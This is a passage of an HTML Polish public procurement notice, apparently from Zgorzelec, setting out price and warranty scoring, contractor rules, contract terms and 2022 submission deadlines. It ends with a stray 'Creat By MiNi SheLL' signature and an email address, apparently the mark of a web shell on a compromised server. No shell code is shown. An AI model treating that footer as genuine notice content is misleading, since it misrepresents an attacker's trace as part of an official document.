tego kryterium <br/>Zamawiający przyjmie maksymalnie 60 miesięczny okres <br/>gwarancji. Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy <br/>niż 60 miesięcy, Zamawiający podaną wartość wpisze do <br/>postanowień umowy, natomiast do obliczeń przyjęta zostanie <br/>maksymalna ilość punktów, tj. 40<br/>W przypadku wskazania minimalnego – 36 miesięcznego okresu <br/>gwarancji Zamawiający przyzna 0 punktów.<br/>Zamawiający odrzuci ofertę Wykonawcy, który zaoferuje okres <br/>gwarancji krótszy niż 36 miesięcy - jako niezgodną z warunkami <br/>zamówienia, a także w przypadku nie wskazania okresu <br/>gwarancji.<br/><br/>3) Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie <br/>obliczona, wg poniższego wzoru:<br/> P = C+G<br/>P – całkowita liczba punktów <br/>C – liczba punktów uzyskanych w kryterium „cena”<br/>G – liczba punktów uzyskanych w kryterium „okres gwarancji”<br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny <br/>ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, <br/>zgodnie z zasadami arytmetyki.<br/>4. W toku badania i oceny ofert Zamawiający może żądać od <br/>Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym <br/>zaoferowanej ceny.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta <br/>zostanie uznana za najkorzystniejszą.<br/>6. Jeżeli nie będzie można wybrać najkorzystniejszej oferty z uwagi na <br/>to, że dwie lub więcej ofert przedstawia taki sam bilans ceny <br/>i innych kryteriów oceny ofert, Zamawiający, zgodnie z art. 248 ust. <br/>1 ustawy Pzp, wybierze spośród tych ofert ofertę, która otrzymała <br/>najwyższą ocenę w kryterium o najwyższej wadze.<br/>7. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej <br/>wadze, Zamawiający wybierze ofertę z najniższą ceną.<br/>8. Jeżeli nie będzie można dokonać wyboru oferty w sposób, o kt órym <br/>mowa w ust. 7 niniejszego Rozdziału SWZ, Zamawiający wezwie <br/>Wykonawców, którzy złożyli te oferty, do złożenia w terminie <br/>określonym przez Zamawiającego ofert dodatkowych zawierających <br/>nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>W takim przypadku Wykonawcy ustanawiają pełnomocnika do <br/>reprezentowania ich w postępowaniu albo do reprezentowania <br/>i zawarcia umowy w sprawie zamówienia publicznego zgodnie z <br/>zapisami Rozdziału XIII SWZ.<br/>2. Oświadczenia potwierdzające brak podstaw wykluczenia z <br/>postępowania składa każdy z Wykonawców wspólnie ubiegających <br/>się o zamówienie – Załącznik Nr 2 do SWZ.<br/>3. Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających <br/>się o udzielenie zamówienia, Zamawiający będzie żądał przed <br/>zawarciem umowy w sprawie zamówienia publicznego kopii umowy <br/>regulującej współpracę tych Wykonawców, o ile umowa taka nie <br/>zostanie załączona do oferty. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały określone w §13 projektu umowy stanowiącego załącznik nr 5 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-01 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/zgorzelec</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-01 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com